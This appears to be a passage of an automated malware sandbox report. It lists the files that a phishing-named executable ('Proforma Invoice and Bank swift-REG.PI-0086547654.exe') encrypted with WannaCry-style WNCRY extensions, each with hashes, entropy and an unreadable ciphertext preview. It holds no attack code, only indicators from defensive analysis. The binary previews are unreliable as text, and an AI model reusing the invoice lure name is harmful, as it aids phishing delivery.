                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\KzWxoKDHqNy24XFwlA6xWw89_DA.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):9160
                                                          Entropy (8bit):7.9806364551141735
                                                          Encrypted:false
                                                          SSDEEP:96:oRjR9d0YDf2T3kUFS1bzOOkx3aWd6g+qNMua/lE5K86QCZY4BRW5OticYayyXX2O:qdJ47FSuW9N+JWbEcYayEG7u1C8KPO7z
                                                          MD5:8BD14082EEEA4077DC76AD1DB215A8BE
                                                          SHA1:E1158DDC694FC0E7B98B9F8CAE3CAA34A8D421EC
                                                          SHA-256:59612FD30F78D4C9A5AC38992410A0333C6B0E072EEAE23BD4BA3EA9D7EC59E7
                                                          SHA-512:804B08CB5BF8C5ED9F37C937994912A198818536FD90CECC75DBE3528DDEE05E9EEBAB87F492B55F2B550EAC8205700683DC2D65E4E4D17116225C20D5D1DCDB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....?.*..X...\...U...O....G..?..Z.....rg0F.]&x.SN(.d..$..3...i...i.90.].P.....A>.|...8-..n..$.r.LQ..N........\K)m.*.(qk.........S.....ZHm....1G_kw...*....g....V.`.H.4.#X..[z......'...d..h....d.#p..fPsA.>.%.1..A...).c.....\I..9{...R....:Go....G..-....."......}O.7.U.i.$.s....& .:..=..z..*b..4..g..Q.*..........B$.=RW.n..p*............F._......F.z....P...}...K.z.R.d.y.. .....(.....e;.uge..mAP.4}3-.......r..7I.x.....7........)qt.k...Bv........:....V.>..&.....Z..9.N..E.G.....xT..\.V...6....AK.5.....q.[....(._..X;.m....J%.....7.J.....V.,}Z..J.cM.9..<.:.b@...ag>...&d.O..Q.k......_.....Z+J.X...Af.d.|....Z..m$..3..v..4..8....zT....C...T}.5.Ho....%..O..ko..$R.Z..;.#...SB...1.#......geO%.L..,h...L2..c.....HV5P........ .lf;....8.:..._.......4..At.....LV....G...I#.h.P#....l.....K...l:s.?..Z...)q{C.*g..N..TK?H.R....U`....-......wt/?.p.<..]..b`...[...=..r...%3......1,..i.'..<..Ns.5y._.U_..:+.)....]...........U'%...i.d..F.....^.7..L

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\LisgCZCwGQ4lRz4go9tlwPslw_k.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16056
                                                          Entropy (8bit):7.989213014524283
                                                          Encrypted:false
                                                          SSDEEP:384:vyueVctt+l92ErJuBdqjmOB6gE+QMCYetMqVeI+w4DWC2OOFk8fD:6uqGtipbaOUgSueSqqxDWCr8fD
                                                          MD5:161E560EAD6EE3182BBBEA51D097EDFE
                                                          SHA1:C054AEBEE2B7C593F0C3DABF7D7B08BEE3DE3EC9
                                                          SHA-256:14705846ED3ECD99607CA4382019D563095A2E43C597D07636D2C8D48B0D84F3
                                                          SHA-512:754E51183F40DB00919C0EE159F20AC3CF9BB32FF78927D56628CE01C0BD3530C4A65C04E1452D0D393F2A15625305B76C89EC7AACE9DD4BA2D14807B2627C0F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....g......0..Q...so0.C.s...@...M`.cYc...i%...f=........WMHMS.....B.yp..z}.......,..[L}0....a...T)..g........{K}2.:..w.F......`...)....X.Y/........`.....$;rL....EA(|.....gMU.l.).n.j..J3L.E.=..0E.t...v(.EO.V>t.Y.:.;.^..U.i.\R*....P.>.k..kQ..C.....=......D~..4y./.k+.Qr]...SU.D.t.@._..2z...3._.|)..~.n......['....V.q....`....E.n...Tk.V...P......p .....~.f+[-...V"D....l.o......c..F.k{..I, 1.....q...c.;..%Vs.......B.. ....<.....u....lk-,H.9j.....b.F..m[..\...E..y88..u$N.....P.At<...<.a.....s....h).W..!....".Q...Z..~..(..].K...8.....&...........#Q....:2rbF........5\......^".1LZ.....!....Q.j.K..?x.......%......3....dhc.kxT=.x0.R...C\?.b..J*.n......:3...$x.o.RD:.A..mg.:..IA../}..|T......u...B....]......KH...".............?(..U.Lc.'f3.{c.H;.W....=..ti5....v...v.gV.h.y.....`...L.'......2'd...1.$Hv.v...#.FHY..A.\..?.....C.{L(..._O...|..:.."V"H....E._.$....T.....d..^..:F..kuT............>......{....c}...7^...|......i.?p;!.ve.. .JC<

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\LisgCZCwGQ4lRz4go9tlwPslw_k.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16056
                                                          Entropy (8bit):7.989213014524283
                                                          Encrypted:false
                                                          SSDEEP:384:vyueVctt+l92ErJuBdqjmOB6gE+QMCYetMqVeI+w4DWC2OOFk8fD:6uqGtipbaOUgSueSqqxDWCr8fD
                                                          MD5:161E560EAD6EE3182BBBEA51D097EDFE
                                                          SHA1:C054AEBEE2B7C593F0C3DABF7D7B08BEE3DE3EC9
                                                          SHA-256:14705846ED3ECD99607CA4382019D563095A2E43C597D07636D2C8D48B0D84F3
                                                          SHA-512:754E51183F40DB00919C0EE159F20AC3CF9BB32FF78927D56628CE01C0BD3530C4A65C04E1452D0D393F2A15625305B76C89EC7AACE9DD4BA2D14807B2627C0F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....g......0..Q...so0.C.s...@...M`.cYc...i%...f=........WMHMS.....B.yp..z}.......,..[L}0....a...T)..g........{K}2.:..w.F......`...)....X.Y/........`.....$;rL....EA(|.....gMU.l.).n.j..J3L.E.=..0E.t...v(.EO.V>t.Y.:.;.^..U.i.\R*....P.>.k..kQ..C.....=......D~..4y./.k+.Qr]...SU.D.t.@._..2z...3._.|)..~.n......['....V.q....`....E.n...Tk.V...P......p .....~.f+[-...V"D....l.o......c..F.k{..I, 1.....q...c.;..%Vs.......B.. ....<.....u....lk-,H.9j.....b.F..m[..\...E..y88..u$N.....P.At<...<.a.....s....h).W..!....".Q...Z..~..(..].K...8.....&...........#Q....:2rbF........5\......^".1LZ.....!....Q.j.K..?x.......%......3....dhc.kxT=.x0.R...C\?.b..J*.n......:3...$x.o.RD:.A..mg.:..IA../}..|T......u...B....]......KH...".............?(..U.Lc.'f3.{c.H;.W....=..ti5....v...v.gV.h.y.....`...L.'......2'd...1.$Hv.v...#.FHY..A.\..?.....C.{L(..._O...|..:.."V"H....E._.$....T.....d..^..:F..kuT............>......{....c}...7^...|......i.?p;!.ve.. .JC<

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):105400
                                                          Entropy (8bit):7.998029628276187
                                                          Encrypted:true
                                                          SSDEEP:3072:Cn3LVBtRuJJDOMS7j6iyMaD/PqqXz8ZKV4gBg8q:cYKMBiyDDH3XoQigWF
                                                          MD5:27D290FAC649504A680474A636E90F36
                                                          SHA1:C3A460EC648C641C75DDAD446879463965B7AD3F
                                                          SHA-256:D8C9500A7A82924B11D90C633A603C4CA2B3658A431440885CC3C7B6B49DADEA
                                                          SHA-512:355C6AE27B90CA47EDB571D1ABC6D8BEF79D2383678F3347F71643B5EF6F8591B8AE0ECB408BC40B1679B20F3EE4A019A082CCE8BE45EA90761DB1B3EED9C05F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......N...4u8.!.*..'........LS.P...:BL.......m.l%d.\.2...#x.U&..'C....%.A.-..&)......-.......e..yJ.7..l.,.@`...f.....Y...&..[O.'.c..2@....u.+.d'.g....Z.. G...zD9..Tz......q,..a......O..54W.o"(......,...[..w..|J..P..:..j...',.i...B....PQ..3.x8../.....................k%...[F.<.....JZ...H...a-.$..]..\.U .>J...uU..H.F.....kL.J....^C9....ok..Be#....p....R..........5..._.......Vzf..e..m.T........w.....2. ....n.cy....P.7_....~Q..r...l.....6.O...V....."~.[.-...u[vj...nE......X.|......:..x..h...,v.9...-.:..}V..;W.!..Zk..\...0.N+E^.s.&.$...\.......\m....mH...%......5..#...X...V..)]....;~..../.2...jPBEv.V...R.[_.Z............K.<...}..m4......5%HU..z...p.P/s:...v....e3....9C.&..A.%...r|6...[.D.ke.....l[f..B@E......EC.2...sI]..ZZ....r8!@.>@(OK~...I.2.[<+F...&......=..a..e..... ...).1..[z.p:...-'..K..:Z....fX..^...G...9lY.h_../J..'X......&.].T9.<7..9d.w.A.....k....w..=..n.......&../...F.o..NZ..zXrLx...}v.P..8..A........7...M...f...%..0

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):105400
                                                          Entropy (8bit):7.998029628276187
                                                          Encrypted:true
                                                          SSDEEP:3072:Cn3LVBtRuJJDOMS7j6iyMaD/PqqXz8ZKV4gBg8q:cYKMBiyDDH3XoQigWF
                                                          MD5:27D290FAC649504A680474A636E90F36
                                                          SHA1:C3A460EC648C641C75DDAD446879463965B7AD3F
                                                          SHA-256:D8C9500A7A82924B11D90C633A603C4CA2B3658A431440885CC3C7B6B49DADEA
                                                          SHA-512:355C6AE27B90CA47EDB571D1ABC6D8BEF79D2383678F3347F71643B5EF6F8591B8AE0ECB408BC40B1679B20F3EE4A019A082CCE8BE45EA90761DB1B3EED9C05F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......N...4u8.!.*..'........LS.P...:BL.......m.l%d.\.2...#x.U&..'C....%.A.-..&)......-.......e..yJ.7..l.,.@`...f.....Y...&..[O.'.c..2@....u.+.d'.g....Z.. G...zD9..Tz......q,..a......O..54W.o"(......,...[..w..|J..P..:..j...',.i...B....PQ..3.x8../.....................k%...[F.<.....JZ...H...a-.$..]..\.U .>J...uU..H.F.....kL.J....^C9....ok..Be#....p....R..........5..._.......Vzf..e..m.T........w.....2. ....n.cy....P.7_....~Q..r...l.....6.O...V....."~.[.-...u[vj...nE......X.|......:..x..h...,v.9...-.:..}V..;W.!..Zk..\...0.N+E^.s.&.$...\.......\m....mH...%......5..#...X...V..)]....;~..../.2...jPBEv.V...R.[_.Z............K.<...}..m4......5%HU..z...p.P/s:...v....e3....9C.&..A.%...r|6...[.D.ke.....l[f..B@E......EC.2...sI]..ZZ....r8!@.>@(OK~...I.2.[<+F...&......=..a..e..... ...).1..[z.p:...-'..K..:Z....fX..^...G...9lY.h_../J..'X......&.].T9.<7..9d.w.A.....k....w..=..n.......&../...F.o..NZ..zXrLx...}v.P..8..A........7...M...f...%..0

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\N1a_FY8_9YTjAb9nKlOpaAAvPEs.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14456
                                                          Entropy (8bit):7.986520658952376
                                                          Encrypted:false
                                                          SSDEEP:384:Zs39Ffvq7IKgpKPt+gL3Vv1QGp2GYsP9OetSyWy:ZiFXz7pKP3VvJ2+AI
                                                          MD5:071E3A319CABC0DF04486E2740B34AB7
                                                          SHA1:6EADC8E33E8F35817B57B65A929BE4B9D833685C
                                                          SHA-256:34718E236AD4F4B4C71F116110149D40ABD196816C1E1A280BB5B08EB9A864E4
                                                          SHA-512:D76157A6C254F8293B4AA6253DB4D9FB1EFF4F6A854C9CB1761A7FECF9BACA61E8570B584AF004A865F131D68EEBB8EF21F59D0AEC308346D6AADAF576474126
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........>Z.-.x?.;.........w.[`.C.:.......=.m.\....M7bA..|....\.Gc.s.....#.[.P..C..!.1.....@btG..|u6.N.?}.Y....m..G..B9.q6&L~......jo10nas..,V..b.Dw......:QX:.....!......mDP.+..;.0....<..:..&.......:[x9bDM.i....M$...g.....3...d5.......!.9..Y...dH;.....W7......v..6`.C^l..cl..R..b.gL...piN..d2..)./.}.QH..l./.H.g.d~.x....|...aJ.'}..wc..F$>.....JW17....(.M.L.V./..~'.QU.B.).ze..f.i......h.D).)....`.w8.;h....[...Rc ._.>.p.G....m&m)..S.[.t...'.m.z0Z...f..b$.:.>^.j..'[G...yP.].....5.3l..x.a....p.\..l...HA,....R.r5a...j._...p.J..4...U.X.E..Q$...S.)Z9......\......1E....fG..-..$7..g.P,Drn..4.....HTv.......U6XT.5...p.....\.]..".b...woLR.`^.2...6h.W6o.7o..PE,cP.z...<....c..)...*....2.d..~P....[...#.hN...y....T....=......6.\.:T.}.O.t5.......7..$..].B.[.g.[z..n.4a@E.|{..`v.}..4.....w.M^w.*.)..7{r._V1...Kl......5.[.x.6....5dMAJ...Mf4=.B.d.c..y.....h.Xf.<....G.%B...S.|.K..K;.>.o..dd.L.:'}..L..T.8n....*.pO.d.q %Ke..%t..)A.n..m.&k..&$..x..S]=N....}s\.3....C

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\N1a_FY8_9YTjAb9nKlOpaAAvPEs.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14456
                                                          Entropy (8bit):7.986520658952376
                                                          Encrypted:false
                                                          SSDEEP:384:Zs39Ffvq7IKgpKPt+gL3Vv1QGp2GYsP9OetSyWy:ZiFXz7pKP3VvJ2+AI
                                                          MD5:071E3A319CABC0DF04486E2740B34AB7
                                                          SHA1:6EADC8E33E8F35817B57B65A929BE4B9D833685C
                                                          SHA-256:34718E236AD4F4B4C71F116110149D40ABD196816C1E1A280BB5B08EB9A864E4
                                                          SHA-512:D76157A6C254F8293B4AA6253DB4D9FB1EFF4F6A854C9CB1761A7FECF9BACA61E8570B584AF004A865F131D68EEBB8EF21F59D0AEC308346D6AADAF576474126
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........>Z.-.x?.;.........w.[`.C.:.......=.m.\....M7bA..|....\.Gc.s.....#.[.P..C..!.1.....@btG..|u6.N.?}.Y....m..G..B9.q6&L~......jo10nas..,V..b.Dw......:QX:.....!......mDP.+..;.0....<..:..&.......:[x9bDM.i....M$...g.....3...d5.......!.9..Y...dH;.....W7......v..6`.C^l..cl..R..b.gL...piN..d2..)./.}.QH..l./.H.g.d~.x....|...aJ.'}..wc..F$>.....JW17....(.M.L.V./..~'.QU.B.).ze..f.i......h.D).)....`.w8.;h....[...Rc ._.>.p.G....m&m)..S.[.t...'.m.z0Z...f..b$.:.>^.j..'[G...yP.].....5.3l..x.a....p.\..l...HA,....R.r5a...j._...p.J..4...U.X.E..Q$...S.)Z9......\......1E....fG..-..$7..g.P,Drn..4.....HTv.......U6XT.5...p.....\.]..".b...woLR.`^.2...6h.W6o.7o..PE,cP.z...<....c..)...*....2.d..~P....[...#.hN...y....T....=......6.\.:T.}.O.t5.......7..$..].B.[.g.[z..n.4a@E.|{..`v.}..4.....w.M^w.*.)..7{r._V1...Kl......5.[.x.6....5dMAJ...Mf4=.B.d.c..y.....h.Xf.<....G.%B...S.|.K..K;.>.o..dd.L.:'}..L..T.8n....*.pO.d.q %Ke..%t..)A.n..m.&k..&$..x..S]=N....}s\.3....C

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\QOGkmcG8R0fLT0lwbpvm9BNIUiY.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3160
                                                          Entropy (8bit):7.9389615003129945
                                                          Encrypted:false
                                                          SSDEEP:96:ok+dd/HnyhkLrr9Rg+K39X1YiYTtTn/NSr0CG:z+TdLrrAx3VOdn/NBt
                                                          MD5:0004F2CC5080CF80C4230A6B95A9C864
                                                          SHA1:8B48ACBA4E5AA727CE4F04215BCC4EB673E3A45C
                                                          SHA-256:9663FF62CA63C88897E5D83D332C65CEA4455F6BBF5147DF3578C02CABBD86EC
                                                          SHA-512:8780197A7CB703044767137AA6E12053E6D9838F3FE1123865CA73E204327E49E712FAB205214D09291B8AFE752D21BFE870C16A47C806483ED2D093960BDF86
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....H$...\i.f....ey.p...~...b.........w...cx..9.m....]b....>...k.y....r.V`..a.,Z#.Xb.^.au.v......9..M....+W.(H..l...Ks.y.H...{r6..y..%._...N.)b.a.D.S#......4Z.I..# .0rQ.....io....<..^;1x.+/..?ie...- =....>7C..)Av.......+.V`.@.;...9i*....Mb|J.8..BC....3..........w.z.+.......(...L..oE..v...qz..HSD..RRX...).T.n*....$..T.......N)U'.....<..Zk..../...D..s8}..Hp.Dl}.5...))......jJ.....cA..Q..N.....Y.!.VBec.G.xi...g'RQ..}.k..AZ......+...+.wS.W1.`=*...I.P.Q%..)V.8).l5..8.v.....e....w..!S>S...g..?.?/.N~Iz[.'z..~)...r..B.~.....v...9...7g.3..[.Fl/.5..+........x.{..#&.t}.\).K.6.....t....{...M.r...3x..bf'].....m...C......!.B..9.v..JP.?.:..k+...Y...Z...m.~..iT).^ ..2...E......h.....{....Gb.+G...).FM......I.........#..d.v.gQ..r...9,....8..._.M.......}.........zC.T9.5.....b0...W..7.=.....V.....i..4 .^ ......#]...H6.H.x8....>.....#^.bo....,.:O4..E).> ..3.m.......5O...:!.$.{.HB........5[...T.z...E$gc@...~'J7..2...k.J#c.4.&{]...T..k...{8t..B

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\QOGkmcG8R0fLT0lwbpvm9BNIUiY.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3160
                                                          Entropy (8bit):7.9389615003129945
                                                          Encrypted:false
                                                          SSDEEP:96:ok+dd/HnyhkLrr9Rg+K39X1YiYTtTn/NSr0CG:z+TdLrrAx3VOdn/NBt
                                                          MD5:0004F2CC5080CF80C4230A6B95A9C864
                                                          SHA1:8B48ACBA4E5AA727CE4F04215BCC4EB673E3A45C
                                                          SHA-256:9663FF62CA63C88897E5D83D332C65CEA4455F6BBF5147DF3578C02CABBD86EC
                                                          SHA-512:8780197A7CB703044767137AA6E12053E6D9838F3FE1123865CA73E204327E49E712FAB205214D09291B8AFE752D21BFE870C16A47C806483ED2D093960BDF86
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....H$...\i.f....ey.p...~...b.........w...cx..9.m....]b....>...k.y....r.V`..a.,Z#.Xb.^.au.v......9..M....+W.(H..l...Ks.y.H...{r6..y..%._...N.)b.a.D.S#......4Z.I..# .0rQ.....io....<..^;1x.+/..?ie...- =....>7C..)Av.......+.V`.@.;...9i*....Mb|J.8..BC....3..........w.z.+.......(...L..oE..v...qz..HSD..RRX...).T.n*....$..T.......N)U'.....<..Zk..../...D..s8}..Hp.Dl}.5...))......jJ.....cA..Q..N.....Y.!.VBec.G.xi...g'RQ..}.k..AZ......+...+.wS.W1.`=*...I.P.Q%..)V.8).l5..8.v.....e....w..!S>S...g..?.?/.N~Iz[.'z..~)...r..B.~.....v...9...7g.3..[.Fl/.5..+........x.{..#&.t}.\).K.6.....t....{...M.r...3x..bf'].....m...C......!.B..9.v..JP.?.:..k+...Y...Z...m.~..iT).^ ..2...E......h.....{....Gb.+G...).FM......I.........#..d.v.gQ..r...9,....8..._.M.......}.........zC.T9.5.....b0...W..7.=.....V.....i..4 .^ ......#]...H6.H.x8....>.....#^.bo....,.:O4..E).> ..3.m.......5O...:!.$.{.HB........5[...T.z...E$gc@...~'J7..2...k.J#c.4.&{]...T..k...{8t..B

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\U7NyqzPRBLq0g0Z9QPSKxnaembc.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11096
                                                          Entropy (8bit):7.984174097114978
                                                          Encrypted:false
                                                          SSDEEP:192:4BwJF3DxVMHghTi1fZZzt/NHEn2aUwJmMxwSLkpOLIJcz3ZJgf7RroO:4BiNWm21PzRNUwmFopOLIJf71b
                                                          MD5:111A146C4AB1838F77F9E6B264F2B26C
                                                          SHA1:6C1A220062AC04DD56F23A2F701B6AAF29F47644
                                                          SHA-256:B170F9A141DFB8E703933138E521D36E2F3DDE32D21594BB646DE641D9FE2C60
                                                          SHA-512:EF740353E7FE1B37A983298B695C8B4F33FD8D501BB5B2A7DF06CE7876F2228BF0B034EBCE9A22741B7AB1E24696C0136BD62A901F297607B3BB57882B1496D2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....e]F_X.A....<....].T.KF...Z.....e8.5..!@....5.4.=..?).g..,&\1.Q..B..K...Q..|...@a..:.|.V5.A}V..?...:y3.UbI....U?~..D..l..c. ,.&.H.Pk...=..6.@. ).0.k..o.......=2._.Pl..YfQH;...5.>..$..[x.%.}...o...2...f.k......&P........7...[.....&....c.C:N2.Q.....=*......B.V.B.......f.3.{p....#..LB.C..-)....w.I=~tC..J.(...a...Q..^...p..V.1h.}...i..ghL..T.e..<B#.&.....p..+O.F.5..?.W...o...~.4g6.R..F....i.S-....Em....W-..v..W....-...\p.h.oI..+....I.^..Eb3.c.....83.mO..B..%z......y..PA...OO0.J31.Lp......S5A...e....#D..7).k....z..:....&.+N.pJ..i..*)...z..).P..O...A).V\p'..H...|.S...Vt...Z..l.V/.....R..a.oZU........}j...Iq.......$.UF...EUn7..S...>.....='t[T....LrXi0.N....#...'..:.].b..u;[...r....D..v.kq.Qc.e.B|.%./.1/..XD.".#..N.1.vt..`.q...w...h..g.4I...n.E.P'.:Z...z%~....kD..AqN......;<..}...Y*-v........|.:4....U..aY7)nHB..;....[?..U.F".43L...e..Oo}..#7u....v.....B.a.T.f...........E..c...JK!H.@IX.L...niw1...;.....go1....L...A.f...........t......q

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\U7NyqzPRBLq0g0Z9QPSKxnaembc.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11096
                                                          Entropy (8bit):7.984174097114978
                                                          Encrypted:false
                                                          SSDEEP:192:4BwJF3DxVMHghTi1fZZzt/NHEn2aUwJmMxwSLkpOLIJcz3ZJgf7RroO:4BiNWm21PzRNUwmFopOLIJf71b
                                                          MD5:111A146C4AB1838F77F9E6B264F2B26C
                                                          SHA1:6C1A220062AC04DD56F23A2F701B6AAF29F47644
                                                          SHA-256:B170F9A141DFB8E703933138E521D36E2F3DDE32D21594BB646DE641D9FE2C60
                                                          SHA-512:EF740353E7FE1B37A983298B695C8B4F33FD8D501BB5B2A7DF06CE7876F2228BF0B034EBCE9A22741B7AB1E24696C0136BD62A901F297607B3BB57882B1496D2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....e]F_X.A....<....].T.KF...Z.....e8.5..!@....5.4.=..?).g..,&\1.Q..B..K...Q..|...@a..:.|.V5.A}V..?...:y3.UbI....U?~..D..l..c. ,.&.H.Pk...=..6.@. ).0.k..o.......=2._.Pl..YfQH;...5.>..$..[x.%.}...o...2...f.k......&P........7...[.....&....c.C:N2.Q.....=*......B.V.B.......f.3.{p....#..LB.C..-)....w.I=~tC..J.(...a...Q..^...p..V.1h.}...i..ghL..T.e..<B#.&.....p..+O.F.5..?.W...o...~.4g6.R..F....i.S-....Em....W-..v..W....-...\p.h.oI..+....I.^..Eb3.c.....83.mO..B..%z......y..PA...OO0.J31.Lp......S5A...e....#D..7).k....z..:....&.+N.pJ..i..*)...z..).P..O...A).V\p'..H...|.S...Vt...Z..l.V/.....R..a.oZU........}j...Iq.......$.UF...EUn7..S...>.....='t[T....LrXi0.N....#...'..:.].b..u;[...r....D..v.kq.Qc.e.B|.%./.1/..XD.".#..N.1.vt..`.q...w...h..g.4I...n.E.P'.:Z...z%~....kD..AqN......;<..}...Y*-v........|.:4....U..aY7)nHB..;....[?..U.F".43L...e..Oo}..#7u....v.....B.a.T.f...........E..c...JK!H.@IX.L...niw1...;.....go1....L...A.f...........t......q

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\XDTV5Ztdmvo1jmUE21mPICYC5h8.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):545288
                                                          Entropy (8bit):7.999629399964461
                                                          Encrypted:true
                                                          SSDEEP:12288:5rtHZ9j0r5Qu1z2X4bBINEsrtobs41AQD23NLayTCPIuyP:51yCu1upNEQcJjthguyP
                                                          MD5:30DBB4C1D0785CC57593FA4F3A750143
                                                          SHA1:0568F1795D4570111C3EB4E3FA4439605EA0B550
                                                          SHA-256:14D4967C81A5D90E2D05F813177F9690C0AC8E1234CB52A9F338222EAF3527BD
                                                          SHA-512:2EBBB06D978272ACD0114E11A824DFC3EC877D67D61EAD4568BC3A456E65C82EE7C0006B24F58BD420EEEAB197A605981AC9E23969435FA862169B32EB0CC115
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....N.......+..F.x.lt.C7bwA...v.YzF.&.Cwy....6.n.H.!.C....er..+{Qjj.Y+..u.&\...H..).....h..c&.6 ,6..b..S):.j.X....E<....f....7\+.!S.n.hP..xd.=,&f.>.,...Bg..E.#...W..=*...7.....tZ..x..y....';L...b...B....KR....z.M..xY$oMR...+..Mxn...:..y.\.&.A...p9.G..&.....P..........N..U...E....3c...F{..KB..`A+y'..........b.6....b. ...=.+j^...&i.e...0._.#..nG`..f....gKp..>.I.s.gEdn6.T.jT.D.y.Z....%...)..#....L.=U.$...s...*..=...V.9.X/U.Un.....9..h...u...Lg..K...|:.c......>5...>E..%...w.=.,...s.....=~.>...{dh!Ix.os.o.._B..k...0j..Y....A..F..a.;.....F.s.0X.Z.wa..Sp..d\...0$.v...d.s...Z.!....g..=,...].1U..z...h.......4I.O...@J...`..UQ.a..@.........1.Hf..4...n.z.....JR...?...z.....t...4,>(R...>%...E$ q<.v..i>c...h.k.i<..W..1y.[.r...y...k.y...d .&.L.1TY.b./.VC.0.@.. ..>}>'..Q..YV..D..'.?..x...+.J.ca............*....'9....\-d....A...f...@..B...@q.Wl6*....&7..~.aT...3..$...V!!.-.. 1!....p..v....x.....a.9...&. 3h....fX......!.Z...F.A...|....&.x~B.l..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\XDTV5Ztdmvo1jmUE21mPICYC5h8.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):545288
                                                          Entropy (8bit):7.999629399964461
                                                          Encrypted:true
                                                          SSDEEP:12288:5rtHZ9j0r5Qu1z2X4bBINEsrtobs41AQD23NLayTCPIuyP:51yCu1upNEQcJjthguyP
                                                          MD5:30DBB4C1D0785CC57593FA4F3A750143
                                                          SHA1:0568F1795D4570111C3EB4E3FA4439605EA0B550
                                                          SHA-256:14D4967C81A5D90E2D05F813177F9690C0AC8E1234CB52A9F338222EAF3527BD
                                                          SHA-512:2EBBB06D978272ACD0114E11A824DFC3EC877D67D61EAD4568BC3A456E65C82EE7C0006B24F58BD420EEEAB197A605981AC9E23969435FA862169B32EB0CC115
                                                          Malicious:true
                                                          Reputation:unknown
